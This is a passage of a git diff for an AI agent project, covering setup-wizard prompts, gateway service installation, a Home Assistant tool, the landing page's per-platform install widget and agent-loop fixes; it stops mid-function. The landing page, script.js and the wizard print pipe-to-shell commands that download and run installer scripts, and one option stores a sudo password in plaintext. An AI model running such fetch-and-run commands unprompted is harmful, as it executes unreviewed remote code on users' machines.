+        menu_choices = [f"  {_emoji_re.sub('', choice).strip()}" for choice in choices]
        
        terminal_menu = TerminalMenu(
            menu_choices,
@@ -383,6 +389,46 @@ def _print_setup_summary(config: dict, hermes_home):
    print()


+def _prompt_container_resources(config: dict):
+    """Prompt for container resource settings (Docker, Singularity, Modal)."""
+    terminal = config.setdefault('terminal', {})
+
+    print()
+    print_info("Container Resource Settings:")
+
+    # Persistence
+    current_persist = terminal.get('container_persistent', True)
+    persist_label = "yes" if current_persist else "no"
+    print_info(f"  Persistent filesystem keeps files between sessions.")
+    print_info(f"  Set to 'no' for ephemeral sandboxes that reset each time.")
+    persist_str = prompt(f"  Persist filesystem across sessions? (yes/no)", persist_label)
+    terminal['container_persistent'] = persist_str.lower() in ('yes', 'true', 'y', '1')
+
+    # CPU
+    current_cpu = terminal.get('container_cpu', 1)
+    cpu_str = prompt(f"  CPU cores", str(current_cpu))
+    try:
+        terminal['container_cpu'] = float(cpu_str)
+    except ValueError:
+        pass
+
+    # Memory
+    current_mem = terminal.get('container_memory', 5120)
+    mem_str = prompt(f"  Memory in MB (5120 = 5GB)", str(current_mem))
+    try:
+        terminal['container_memory'] = int(mem_str)
+    except ValueError:
+        pass
+
+    # Disk
+    current_disk = terminal.get('container_disk', 51200)
+    disk_str = prompt(f"  Disk in MB (51200 = 50GB)", str(current_disk))
+    try:
+        terminal['container_disk'] = int(disk_str)
+    except ValueError:
+        pass
+
+
 def run_setup_wizard(args):
    """Run the interactive setup wizard."""
    ensure_hermes_home()
@@ -390,11 +436,20 @@ def run_setup_wizard(args):
    config = load_config()
    hermes_home = get_hermes_home()
    
-    # Check if this is an existing installation with config (any provider or config file)
+    # Check if this is an existing installation with a provider configured.
+    # Just having config.yaml is NOT enough — the installer creates it from
+    # a template, so it always exists after install. We need an actual
+    # inference provider to consider it "existing" (otherwise quick mode
+    # would skip provider selection, leaving hermes non-functional).
+    # NOTE: Use bool() not `is not None` — the .env template has empty
+    # values (e.g. OPENROUTER_API_KEY=) that load_dotenv sets to "", which
+    # passes `is not None` but isn't a real configured provider.
+    from hermes_cli.auth import get_active_provider
+    active_provider = get_active_provider()
    is_existing = (
-        get_env_value("OPENROUTER_API_KEY") is not None
-        or get_env_value("OPENAI_BASE_URL") is not None
-        or get_config_path().exists()
+        bool(get_env_value("OPENROUTER_API_KEY"))
+        or bool(get_env_value("OPENAI_BASE_URL"))
+        or active_provider is not None
    )
    
    # Import migration helpers
@@ -945,6 +1000,42 @@ def run_setup_wizard(args):
    # Map index to backend name (handles platform differences)
    selected_backend = idx_to_backend.get(terminal_idx)
    
+    # Validate that required binaries exist for the chosen backend
+    import shutil as _shutil
+    _backend_bins = {
+        'docker': ('docker', [
+            "Docker is not installed on this machine.",
+            "Install Docker Desktop: https://www.docker.com/products/docker-desktop/",
+            "On Linux: curl -fsSL https://get.docker.com | sh",
+        ]),
+        'singularity': (None, []),  # check both names
+        'ssh': ('ssh', [
+            "SSH client not found.",
+            "On Linux: sudo apt install openssh-client",
+            "On macOS: SSH should be pre-installed.",
+        ]),
+    }
+    if selected_backend == 'docker':
+        if not _shutil.which('docker'):
+            print()
+            print_warning("Docker is not installed on this machine.")
+            print_info("  Install Docker Desktop: https://www.docker.com/products/docker-desktop/")
+            print_info("  On Linux: curl -fsSL https://get.docker.com | sh")
+            print()
+            if not prompt_yes_no("  Proceed with Docker anyway? (you can install it later)", False):
+                print_info("  Falling back to local backend.")
+                selected_backend = 'local'
+    elif selected_backend == 'singularity':
+        if not _shutil.which('apptainer') and not _shutil.which('singularity'):
+            print()
+            print_warning("Neither apptainer nor singularity is installed on this machine.")
+            print_info("  Apptainer: https://apptainer.org/docs/admin/main/installation.html")
+            print_info("  This is typically only available on HPC/Linux systems.")
+            print()
+            if not prompt_yes_no("  Proceed with Singularity anyway? (you can install it later)", False):
+                print_info("  Falling back to local backend.")
+                selected_backend = 'local'
+
    if selected_backend == 'local':
        config.setdefault('terminal', {})['backend'] = 'local'
        print_info("Local Execution Configuration:")
@@ -970,6 +1061,10 @@ def run_setup_wizard(args):
            cwd_expanded = cwd_input
        save_env_value("MESSAGING_CWD", cwd_expanded)
        
+        print()
+        print_info("Note: Container resource settings (CPU, memory, disk, persistence)")
+        print_info("are in your config but only apply to Docker/Singularity/Modal backends.")
+
        if prompt_yes_no("  Enable sudo support? (allows agent to run sudo commands)", False):
            print_warning("  SECURITY WARNING: Sudo password will be stored in plaintext")
            sudo_pass = prompt("  Sudo password (leave empty to skip)", password=True)
@@ -989,6 +1084,7 @@ def run_setup_wizard(args):
            print_info("Requires Docker Desktop for Windows")
        docker_image = prompt("  Docker image", default_docker)
        config['terminal']['docker_image'] = docker_image
+        _prompt_container_resources(config)
        print_success("Terminal set to Docker")
    
    elif selected_backend == 'singularity':
@@ -998,6 +1094,7 @@ def run_setup_wizard(args):
        print_info("Requires apptainer or singularity to be installed")
        singularity_image = prompt("  Image (docker:// prefix for Docker Hub)", default_singularity)
        config['terminal']['singularity_image'] = singularity_image
+        _prompt_container_resources(config)
        print_success("Terminal set to Singularity/Apptainer")
    
    elif selected_backend == 'modal':
@@ -1048,6 +1145,7 @@ def run_setup_wizard(args):
        if token_secret:
            save_env_value("MODAL_TOKEN_SECRET", token_secret)
        
+        _prompt_container_resources(config)
        print_success("Terminal set to Modal")
    
    elif selected_backend == 'ssh':
@@ -1077,6 +1175,9 @@ def run_setup_wizard(args):
        if ssh_key:
            save_env_value("TERMINAL_SSH_KEY", ssh_key)
        
+        print()
+        print_info("Note: Container resource settings (CPU, memory, disk, persistence)")
+        print_info("are in your config but only apply to Docker/Singularity/Modal backends.")
        print_success("Terminal set to SSH")
    # else: Keep current (selected_backend is None)
    
@@ -1382,23 +1483,15 @@ def run_setup_wizard(args):
    existing_whatsapp = get_env_value('WHATSAPP_ENABLED')
    if not existing_whatsapp and prompt_yes_no("Set up WhatsApp?", False):
        print_info("WhatsApp connects via a built-in bridge (Baileys).")
-        print_info("Requires Node.js (already installed if you have browser tools).")
-        print_info("On first gateway start, you'll scan a QR code with your phone.")
+        print_info("Requires Node.js. Run 'hermes whatsapp' for guided setup.")
        print()
-        if prompt_yes_no("Enable WhatsApp?", True):
+        if prompt_yes_no("Enable WhatsApp now?", True):
            save_env_value("WHATSAPP_ENABLED", "true")
            print_success("WhatsApp enabled")
-            
-            allowed_users = prompt("  Your phone number (e.g. 15551234567, comma-separated for multiple)")
-            if allowed_users:
-                save_env_value("WHATSAPP_ALLOWED_USERS", allowed_users.replace(" ", ""))
-                print_success("WhatsApp allowlist configured")
-            else:
-                print_info("⚠️  No allowlist set — anyone who messages your WhatsApp will get a response!")
-            
-            print_info("Start the gateway with 'hermes gateway' and scan the QR code.")
+            print_info("Run 'hermes whatsapp' to choose your mode (separate bot number")
+            print_info("or personal self-chat) and pair via QR code.")
    
-    # Gateway reminder
+    # Gateway service setup
    any_messaging = (
        get_env_value('TELEGRAM_BOT_TOKEN')
        or get_env_value('DISCORD_BOT_TOKEN')
@@ -1409,10 +1502,7 @@ def run_setup_wizard(args):
        print()
        print_info("━" * 50)
        print_success("Messaging platforms configured!")
-        print_info("Start the gateway after setup to bring your bots online:")
-        print_info("   hermes gateway              # Run in foreground")
-        print_info("   hermes gateway install      # Install as background service (Linux)")
-        
+
        # Check if any home channels are missing
        missing_home = []
        if get_env_value('TELEGRAM_BOT_TOKEN') and not get_env_value('TELEGRAM_HOME_CHANNEL'):
@@ -1421,16 +1511,76 @@ def run_setup_wizard(args):
            missing_home.append("Discord")
        if get_env_value('SLACK_BOT_TOKEN') and not get_env_value('SLACK_HOME_CHANNEL'):
            missing_home.append("Slack")
-        
+
        if missing_home:
            print()
-            print_info(f"⚠️  No home channel set for: {', '.join(missing_home)}")
+            print_warning(f"No home channel set for: {', '.join(missing_home)}")
            print_info("   Without a home channel, cron jobs and cross-platform")
            print_info("   messages can't be delivered to those platforms.")
            print_info("   Set one later with /set-home in your chat, or:")
            for plat in missing_home:
                print_info(f"     hermes config set {plat.upper()}_HOME_CHANNEL <channel_id>")
-        
+
+        # Offer to install the gateway as a system service
+        import platform as _platform
+        _is_linux = _platform.system() == "Linux"
+        _is_macos = _platform.system() == "Darwin"
+
+        from hermes_cli.gateway import (
+            _is_service_installed, _is_service_running,
+            systemd_install, systemd_start, systemd_restart,
+            launchd_install, launchd_start, launchd_restart,
+        )
+
+        service_installed = _is_service_installed()
+        service_running = _is_service_running()
+
+        print()
+        if service_running:
+            if prompt_yes_no("  Restart the gateway to pick up changes?", True):
+                try:
+                    if _is_linux:
+                        systemd_restart()
+                    elif _is_macos:
+                        launchd_restart()
+                except Exception as e:
+                    print_error(f"  Restart failed: {e}")
+        elif service_installed:
+            if prompt_yes_no("  Start the gateway service?", True):
+                try:
+                    if _is_linux:
+                        systemd_start()
+                    elif _is_macos:
+                        launchd_start()
+                except Exception as e:
+                    print_error(f"  Start failed: {e}")
+        elif _is_linux or _is_macos:
+            svc_name = "systemd" if _is_linux else "launchd"
+            if prompt_yes_no(f"  Install the gateway as a {svc_name} service? (runs in background, starts on boot)", True):
+                try:
+                    if _is_linux:
+                        systemd_install(force=False)
+                    else:
+                        launchd_install(force=False)
+                    print()
+                    if prompt_yes_no("  Start the service now?", True):
+                        try:
+                            if _is_linux:
+                                systemd_start()
+                            elif _is_macos:
+                                launchd_start()
+                        except Exception as e:
+                            print_error(f"  Start failed: {e}")
+                except Exception as e:
+                    print_error(f"  Install failed: {e}")
+                    print_info("  You can try manually: hermes gateway install")
+            else:
+                print_info("  You can install later: hermes gateway install")
+                print_info("  Or run in foreground:  hermes gateway")
+        else:
+            print_info("Start the gateway to bring your bots online:")
+            print_info("   hermes gateway              # Run in foreground")
+
        print_info("━" * 50)
    
    # =========================================================================
--- a/hermes_cli/tools_config.py
+++ b/hermes_cli/tools_config.py
@@ -36,6 +36,7 @@ CONFIGURABLE_TOOLSETS = [
    ("delegation",      "👥 Task Delegation",           "delegate_task"),
    ("cronjob",         "⏰ Cron Jobs",                 "schedule, list, remove"),
    ("rl",              "🧪 RL Training",               "Tinker-Atropos training tools"),
+    ("homeassistant",    "🏠 Home Assistant",           "smart home device control"),
 ]

 # Platform display config
@@ -312,6 +313,8 @@ TOOLSET_ENV_REQUIREMENTS = {
    "tts":        [],  # Edge TTS is free, no key needed
    "rl":         [("TINKER_API_KEY",       "https://tinker-console.thinkingmachines.ai/keys"),
                   ("WANDB_API_KEY",        "https://wandb.ai/authorize")],
+    "homeassistant": [("HASS_TOKEN", "Home Assistant > Profile > Long-Lived Access Tokens"),
+                      ("HASS_URL",   None)],
 }


--- a/honcho_integration/client.py
+++ b/honcho_integration/client.py
@@ -97,15 +97,27 @@ class HonchoClientConfig:
        )
        linked_hosts = host_block.get("linkedHosts", [])

+        api_key = raw.get("apiKey") or os.environ.get("HONCHO_API_KEY")
+
+        # Auto-enable when API key is present (unless explicitly disabled)
+        # This matches user expectations: setting an API key should activate the feature.
+        explicit_enabled = raw.get("enabled")
+        if explicit_enabled is None:
+            # Not explicitly set in config -> auto-enable if API key exists
+            enabled = bool(api_key)
+        else:
+            # Respect explicit setting
+            enabled = explicit_enabled
+
        return cls(
            host=host,
            workspace_id=workspace,
-            api_key=raw.get("apiKey") or os.environ.get("HONCHO_API_KEY"),
+            api_key=api_key,
            environment=raw.get("environment", "production"),
            peer_name=raw.get("peerName"),
            ai_peer=ai_peer,
            linked_hosts=linked_hosts,
-            enabled=raw.get("enabled", False),
+            enabled=enabled,
            save_messages=raw.get("saveMessages", True),
            context_tokens=raw.get("contextTokens") or host_block.get("contextTokens"),
            session_strategy=raw.get("sessionStrategy", "per-directory"),
--- a/landingpage/index.html
+++ b/landingpage/index.html
@@ -69,14 +69,38 @@
            </p>

            <div class="hero-install">
-                <div class="install-box">
-                    <code id="install-command">curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.sh | bash</code>
-                    <button class="copy-btn" onclick="copyInstall()" title="Copy to clipboard">
-                        <svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><rect x="9" y="9" width="13" height="13" rx="2" ry="2"/><path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1"/></svg>
-                        <span class="copy-text">Copy</span>
-                    </button>
+                <div class="install-widget">
+                    <div class="install-widget-header">
+                        <div class="install-dots">
+                            <span class="dot dot-red"></span>
+                            <span class="dot dot-yellow"></span>
+                            <span class="dot dot-green"></span>
+                        </div>
+                        <div class="install-tabs">
+                            <button class="install-tab active" data-platform="linux" onclick="switchPlatform('linux')">
+                                <svg width="14" height="14" viewBox="0 0 24 24" fill="currentColor" style="opacity:0.7"><path d="M12.504 0c-.155 0-.315.008-.48.021-4.226.333-3.105 4.807-3.17 6.298-.076 1.092-.3 1.953-1.05 3.02-.885 1.051-2.127 2.75-2.716 4.521-.278.832-.41 1.684-.287 2.489a.424.424 0 00-.11.135c-.26.268-.45.6-.663.839-.199.199-.485.267-.797.4-.313.136-.658.269-.864.68-.09.189-.136.394-.132.602 0 .199.027.4.055.536.058.399.116.728.04.97-.249.68-.28 1.145-.106 1.484.174.334.535.47.94.601.81.2 1.91.135 2.774.6.926.466 1.866.67 2.616.47.526-.116.97-.464 1.208-.946.587-.003 1.23-.269 2.26-.334.699-.058 1.574.267 2.577.2.025.134.063.198.114.333l.003.003c.391.778 1.113 1.368 1.884 1.43.39.03.8-.066 1.109-.199.69-.3 1.286-1.006 1.652-1.963.086-.235.188-.479.152-.88-.064-.406-.358-.597-.548-.899-.19-.301-.2-.335-.2-.68 0-.348.076-.664.152-.901.1-.256.233-.478.21-.783l-.003-.003c-.091-.472-.279-.861-.607-1.144-.327-.283-.762-.409-1.032-.433-.18-.04-.33-.063-.44-.143-.12-.09-.21-.29-.19-.543 .029-.272.089-.549.178-.822.188-.57.456-1.128.748-1.633.02-.044.04-.09.06-.133a.205.205 0 00.015-.04c.413-.916.64-1.866.64-2.699 0-1.039-.258-1.904-.608-2.572-.11-.188-.208-.368-.32-.527a.604.604 0 00-.038-.06c-.725-1.05-1.735-1.572-2.74-1.795a6.986 6.986 0 00-1.18-.133h-.005c-.163 0-.32.01-.478.025z"/></svg>
+                                Linux / macOS
+                            </button>
+                            <button class="install-tab" data-platform="powershell" onclick="switchPlatform('powershell')">
+                                <svg width="14" height="14" viewBox="0 0 24 24" fill="currentColor" style="opacity:0.7"><path d="M0 3.449L9.75 2.1v9.451H0m10.949-9.602L24 0v11.4H10.949M0 12.6h9.75v9.451L0 20.699M10.949 12.6H24V24l-12.9-1.801"/></svg>
+                                PowerShell
+                            </button>
+                            <button class="install-tab" data-platform="cmd" onclick="switchPlatform('cmd')">
+                                <svg width="14" height="14" viewBox="0 0 24 24" fill="currentColor" style="opacity:0.7"><path d="M0 3.449L9.75 2.1v9.451H0m10.949-9.602L24 0v11.4H10.949M0 12.6h9.75v9.451L0 20.699M10.949 12.6H24V24l-12.9-1.801"/></svg>
+                                CMD
+                            </button>
+                        </div>
+                    </div>
+                    <div class="install-widget-body">
+                        <span class="install-prompt" id="install-prompt">$</span>
+                        <code id="install-command">curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.sh | bash</code>
+                        <button class="copy-btn" onclick="copyInstall()" title="Copy to clipboard">
+                            <svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><rect x="9" y="9" width="13" height="13" rx="2" ry="2"/><path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1"/></svg>
+                            <span class="copy-text">Copy</span>
+                        </button>
+                    </div>
                </div>
-                <p class="install-note">Works on Linux & macOS · No Python prerequisite · Installs everything automatically</p>
+                <p class="install-note" id="install-note">Works on Linux, macOS & WSL · No prerequisites · Installs everything automatically</p>
            </div>

            <div class="hero-links">
@@ -330,12 +354,16 @@
                        <h4>Install</h4>
                        <div class="code-block">
                            <div class="code-header">
-                                <span>bash</span>
-                                <button class="copy-btn" onclick="copyText(this)" data-text="curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.sh | bash">Copy</button>
+                                <div class="code-tabs">
+                                    <button class="code-tab active" data-platform="linux" onclick="switchStepPlatform('linux')">Linux / macOS</button>
+                                    <button class="code-tab" data-platform="powershell" onclick="switchStepPlatform('powershell')">PowerShell</button>
+                                    <button class="code-tab" data-platform="cmd" onclick="switchStepPlatform('cmd')">CMD</button>
+                                </div>
+                                <button class="copy-btn" id="step1-copy" onclick="copyText(this)" data-text="curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.sh | bash">Copy</button>
                            </div>
-                            <pre><code>curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.sh | bash</code></pre>
+                            <pre><code id="step1-command">curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.sh | bash</code></pre>
                        </div>
-                        <p class="step-note">Installs uv, Python 3.11, clones the repo, sets up everything. No sudo needed.</p>
+                        <p class="step-note" id="step1-note">Installs uv, Python 3.11, clones the repo, sets up everything. No sudo needed.</p>
                    </div>
                </div>

@@ -394,14 +422,7 @@ hermes gateway install</code></pre>
            </div>

            <div class="install-windows">
-                <p>Windows? Use WSL or PowerShell:</p>
-                <div class="code-block code-block-sm">
-                    <div class="code-header">
-                        <span>powershell</span>
-                        <button class="copy-btn" onclick="copyText(this)" data-text="irm https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.ps1 | iex">Copy</button>
-                    </div>
-                    <pre><code>irm https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.ps1 | iex</code></pre>
-                </div>
+                <p>🪟 Windows requires <a href="https://git-scm.com/download/win" target="_blank" rel="noopener">Git for Windows</a> — Hermes uses Git Bash internally for shell commands.</p>
            </div>
        </div>
    </section>
--- a/landingpage/script.js
+++ b/landingpage/script.js
@@ -2,11 +2,79 @@
 // Hermes Agent Landing Page — Interactions
 // =========================================================================

+// --- Platform install commands ---
+const PLATFORMS = {
+    linux: {
+        command: 'curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.sh | bash',
+        prompt: '$',
+        note: 'Works on Linux, macOS & WSL · No prerequisites · Installs everything automatically',
+        stepNote: 'Installs uv, Python 3.11, clones the repo, sets up everything. No sudo needed.',
+    },
+    powershell: {
+        command: 'irm https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.ps1 | iex',
+        prompt: 'PS>',
+        note: 'Windows PowerShell · Requires Git for Windows · Installs everything automatically',
+        stepNote: 'Requires Git for Windows. Installs uv, Python 3.11, sets up everything.',
+    },
+    cmd: {
+        command: 'curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.cmd -o install.cmd && install.cmd && del install.cmd',
+        prompt: '>',
+        note: 'Windows CMD · Requires Git for Windows · Installs everything automatically',
+        stepNote: 'Requires Git for Windows. Downloads and runs the installer, then cleans up.',
+    },
+};
+
+function detectPlatform() {
+    const ua = navigator.userAgent.toLowerCase();
+    if (ua.includes('win')) return 'powershell';
+    return 'linux';
+}
+
+function switchPlatform(platform) {
+    const cfg = PLATFORMS[platform];
+    if (!cfg) return;
+
+    // Update hero install widget
+    const commandEl = document.getElementById('install-command');
+    const promptEl = document.getElementById('install-prompt');
+    const noteEl = document.getElementById('install-note');
+
+    if (commandEl) commandEl.textContent = cfg.command;
+    if (promptEl) promptEl.textContent = cfg.prompt;
+    if (noteEl) noteEl.textContent = cfg.note;
+
+    // Update active tab in hero
+    document.querySelectorAll('.install-tab').forEach(tab => {
+        tab.classList.toggle('active', tab.dataset.platform === platform);
+    });
+
+    // Sync the step section tabs too
+    switchStepPlatform(platform);
+}
+
+function switchStepPlatform(platform) {
+    const cfg = PLATFORMS[platform];
+    if (!cfg) return;
+
+    const commandEl = document.getElementById('step1-command');
+    const copyBtn = document.getElementById('step1-copy');
+    const noteEl = document.getElementById('step1-note');
+
+    if (commandEl) commandEl.textContent = cfg.command;
+    if (copyBtn) copyBtn.setAttribute('data-text', cfg.command);
+    if (noteEl) noteEl.textContent = cfg.stepNote;
+
+    // Update active tab in step section
+    document.querySelectorAll('.code-tab').forEach(tab => {
+        tab.classList.toggle('active', tab.dataset.platform === platform);
+    });
+}
+
 // --- Copy to clipboard ---
 function copyInstall() {
    const text = document.getElementById('install-command').textContent;
    navigator.clipboard.writeText(text).then(() => {
-        const btn = document.querySelector('.hero-install .copy-btn');
+        const btn = document.querySelector('.install-widget-body .copy-btn');
        const original = btn.querySelector('.copy-text').textContent;
        btn.querySelector('.copy-text').textContent = 'Copied!';
        btn.style.color = 'var(--gold)';
@@ -243,6 +311,10 @@ class TerminalDemo {

 // --- Initialize ---
 document.addEventListener('DOMContentLoaded', () => {
+    // Auto-detect platform and set the right install command
+    const detectedPlatform = detectPlatform();
+    switchPlatform(detectedPlatform);
+
    initScrollAnimations();

    // Terminal demo - start when visible
--- a/landingpage/style.css
+++ b/landingpage/style.css
@@ -245,33 +245,132 @@ strong {
    margin-bottom: 32px;
 }

-.install-box {
-    display: flex;
-    align-items: center;
-    gap: 0;
+/* --- Install Widget (hero tabbed installer) --- */
+.install-widget {
+    max-width: 740px;
+    margin: 0 auto;
    background: var(--bg-card);
    border: 1px solid var(--border);
    border-radius: var(--radius);
+    overflow: hidden;
+    transition: border-color 0.3s;
+}
+
+.install-widget:hover {
+    border-color: var(--border-hover);
+}
+
+.install-widget-header {
+    display: flex;
+    align-items: center;
+    gap: 16px;
+    padding: 10px 16px;
+    background: rgba(255, 255, 255, 0.02);
+    border-bottom: 1px solid var(--border);
+}
+
+.install-dots {
+    display: flex;
+    gap: 6px;
+    flex-shrink: 0;
+}
+
+.install-dots .dot {
+    width: 10px;
+    height: 10px;
+    border-radius: 50%;
+}
+
+.install-tabs {
+    display: flex;
+    gap: 4px;
+    flex-wrap: wrap;
+}
+
+.install-tab {
+    display: inline-flex;
+    align-items: center;
+    gap: 6px;
+    padding: 5px 14px;
+    border: none;
+    border-radius: 6px;
+    font-family: var(--font-sans);
+    font-size: 12px;
+    font-weight: 500;
+    cursor: pointer;
+    transition: all 0.2s;
+    background: transparent;
+    color: var(--text-muted);
+}
+
+.install-tab:hover {
+    color: var(--text-dim);
+    background: rgba(255, 255, 255, 0.04);
+}
+
+.install-tab.active {
+    background: rgba(255, 215, 0, 0.12);
+    color: var(--gold);
+}
+
+.install-tab svg {
+    flex-shrink: 0;
+}
+
+.install-widget-body {
+    display: flex;
+    align-items: center;
+    gap: 10px;
    padding: 14px 16px;
-    max-width: 680px;
-    margin: 0 auto;
    font-family: var(--font-mono);
    font-size: 13px;
    color: var(--text);
    overflow-x: auto;
-    transition: border-color 0.3s;
 }

-.install-box:hover {
-    border-color: var(--border-hover);
+.install-prompt {
+    color: var(--gold);
+    font-weight: 600;
+    flex-shrink: 0;
+    opacity: 0.7;
 }

-.install-box code {
+.install-widget-body code {
    flex: 1;
    white-space: nowrap;
    overflow: hidden;
    text-overflow: ellipsis;
    text-align: left;
+    transition: opacity 0.15s;
+}
+
+/* --- Code block tabs (install step section) --- */
+.code-tabs {
+    display: flex;
+    gap: 2px;
+}
+
+.code-tab {
+    padding: 3px 10px;
+    border: none;
+    border-radius: 4px;
+    font-family: var(--font-mono);
+    font-size: 11px;
+    font-weight: 500;
+    cursor: pointer;
+    transition: all 0.2s;
+    background: transparent;
+    color: var(--text-muted);
+}
+
+.code-tab:hover {
+    color: var(--text-dim);
+    background: rgba(255, 255, 255, 0.04);
+}
+
+.code-tab.active {
+    background: rgba(255, 215, 0, 0.1);
+    color: var(--gold);
 }

 .copy-btn {
@@ -948,17 +1047,35 @@ strong {
        margin: 0 auto 28px;
    }

-    .install-box {
+    .install-widget-body {
        font-size: 10px;
        padding: 10px 12px;
    }

-    .install-box code {
+    .install-widget-body code {
        overflow: hidden;
        text-overflow: ellipsis;
        display: block;
    }

+    .install-widget-header {
+        padding: 8px 12px;
+        gap: 10px;
+    }
+
+    .install-tabs {
+        gap: 2px;
+    }
+
+    .install-tab {
+        padding: 4px 10px;
+        font-size: 11px;
+    }
+
+    .install-tab svg {
+        display: none;
+    }
+
    .copy-btn {
        padding: 3px 6px;
    }
--- a/model_tools.py
+++ b/model_tools.py
@@ -94,6 +94,7 @@ def _discover_tools():
        "tools.process_registry",
        "tools.send_message_tool",
        "tools.honcho_tools",
+        "tools.homeassistant_tool",
    ]
    import importlib
    for mod_name in _modules:
@@ -105,6 +106,13 @@ def _discover_tools():

 _discover_tools()

+# MCP tool discovery (external MCP servers from config)
+try:
+    from tools.mcp_tool import discover_mcp_tools
+    discover_mcp_tools()
+except Exception as e:
+    logger.debug("MCP tool discovery failed: %s", e)
+

 # =============================================================================
 # Backward-compat constants  (built once after discovery)
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -47,6 +47,8 @@ cli = ["simple-term-menu"]
 tts-premium = ["elevenlabs"]
 pty = ["ptyprocess>=0.7.0"]
 honcho = ["honcho-ai>=2.0.1"]
+mcp = ["mcp>=1.2.0"]
+homeassistant = ["aiohttp>=3.9.0"]
 all = [
  "hermes-agent[modal]",
  "hermes-agent[messaging]",
@@ -57,6 +59,8 @@ all = [
  "hermes-agent[slack]",
  "hermes-agent[pty]",
  "hermes-agent[honcho]",
+  "hermes-agent[mcp]",
+  "hermes-agent[homeassistant]",
 ]

 [project.scripts]
--- a/run_agent.py
+++ b/run_agent.py
@@ -2212,7 +2212,7 @@ class AIAgent:
                    response_item_id if isinstance(response_item_id, str) else None,
                )

-                tool_calls.append({
+                tc_dict = {
                    "id": call_id,
                    "call_id": call_id,
                    "response_item_id": response_item_id,
@@ -2222,7 +2222,15 @@ class AIAgent:
                        "arguments": tool_call.function.arguments
                    },
                }
-                )
+                # Preserve extra_content (e.g. Gemini thought_signature) so it
+                # is sent back on subsequent API calls.  Without this, Gemini 3
+                # thinking models reject the request with a 400 error.
+                extra = getattr(tool_call, "extra_content", None)
+                if extra is not None:
+                    if hasattr(extra, "model_dump"):
+                        extra = extra.model_dump()
+                    tc_dict["extra_content"] = extra
+                tool_calls.append(tc_dict)
            msg["tool_calls"] = tool_calls

        return msg
@@ -2273,6 +2281,7 @@ class AIAgent:
                        api_msg["reasoning_content"] = reasoning
                api_msg.pop("reasoning", None)
                api_msg.pop("finish_reason", None)
+                api_msg.pop("_flush_sentinel", None)
                api_messages.append(api_msg)

            if self._cached_system_prompt:
@@ -2441,7 +2450,7 @@ class AIAgent:
            if self.tool_progress_callback:
                try:
                    preview = _build_tool_preview(function_name, function_args)
-                    self.tool_progress_callback(function_name, preview)
+                    self.tool_progress_callback(function_name, preview, function_args)
                except Exception as cb_err:
                    logging.debug(f"Tool progress callback error: {cb_err}")

@@ -2467,6 +2476,7 @@ class AIAgent:
                        role_filter=function_args.get("role_filter"),
                        limit=function_args.get("limit", 3),
                        db=self._session_db,
+                        current_session_id=self.session_id,
                    )
                tool_duration = time.time() - tool_start_time
                if self.quiet_mode:
@@ -2666,7 +2676,7 @@ class AIAgent:

            if self.api_mode == "codex_responses":
                codex_kwargs = self._build_api_kwargs(api_messages)
-                codex_kwargs["tools"] = None
+                codex_kwargs.pop("tools", None)
                summary_response = self._run_codex_stream(codex_kwargs)
                assistant_message, _ = self._normalize_codex_response(summary_response)
                final_response = (assistant_message.content or "").strip() if assistant_message else ""
@@ -2712,7 +2722,7 @@ class AIAgent:
                # Retry summary generation
                if self.api_mode == "codex_responses":
                    codex_kwargs = self._build_api_kwargs(api_messages)
-                    codex_kwargs["tools"] = None
+                    codex_kwargs.pop("tools", None)
                    retry_response = self._run_codex_stream(codex_kwargs)
                    retry_msg, _ = self._normalize_codex_response(retry_response)
                    final_response = (retry_msg.content or "").strip() if retry_msg else ""
@@ -2776,8 +2786,8 @@ class AIAgent:
        self._turns_since_memory = 0
        self._iters_since_skill = 0
        
-        # Initialize conversation
-        messages = conversation_history or []
+        # Initialize conversation (copy to avoid mutating the caller's list)
+        messages = list(conversation_history) if conversation_history else []
        
        # Hydrate todo store from conversation history (gateway creates a fresh
        # AIAgent per message, so the in-memory store is empty -- we need to
@@ -2852,6 +2862,51 @@ class AIAgent:

        active_system_prompt = self._cached_system_prompt

+        # ── Preflight context compression ──
+        # Before entering the main loop, check if the loaded conversation
+        # history already exceeds the model's context threshold.  This handles
+        # cases where a user switches to a model with a smaller context window
+        # while having a large existing session — compress proactively rather
+        # than waiting for an API error (which might be caught as a non-retryable
+        # 4xx and abort the request entirely).
+        if (
+            self.compression_enabled
+            and len(messages) > self.context_compressor.protect_first_n
+                                + self.context_compressor.protect_last_n + 1
+        ):
+            _sys_tok_est = estimate_tokens_rough(active_system_prompt or "")
+            _msg_tok_est = estimate_messages_tokens_rough(messages)
+            _preflight_tokens = _sys_tok_est + _msg_tok_est
+
+            if _preflight_tokens >= self.context_compressor.threshold_tokens:
+                logger.info(
+                    "Preflight compression: ~%s tokens >= %s threshold (model %s, ctx %s)",
+                    f"{_preflight_tokens:,}",
+                    f"{self.context_compressor.threshold_tokens:,}",
+                    self.model,
+                    f"{self.context_compressor.context_length:,}",
+                )
+                if not self.quiet_mode:
+                    print(
+                        f"📦 Preflight compression: ~{_preflight_tokens:,} tokens "
+                        f">= {self.context_compressor.threshold_tokens:,} threshold"
+                    )
+                # May need multiple passes for very large sessions with small
+                # context windows (each pass summarises the middle N turns).
+                for _pass in range(3):
+                    _orig_len = len(messages)
+                    messages, active_system_prompt = self._compress_context(
+                        messages, system_message, approx_tokens=_preflight_tokens
+                    )
+                    if len(messages) >= _orig_len:
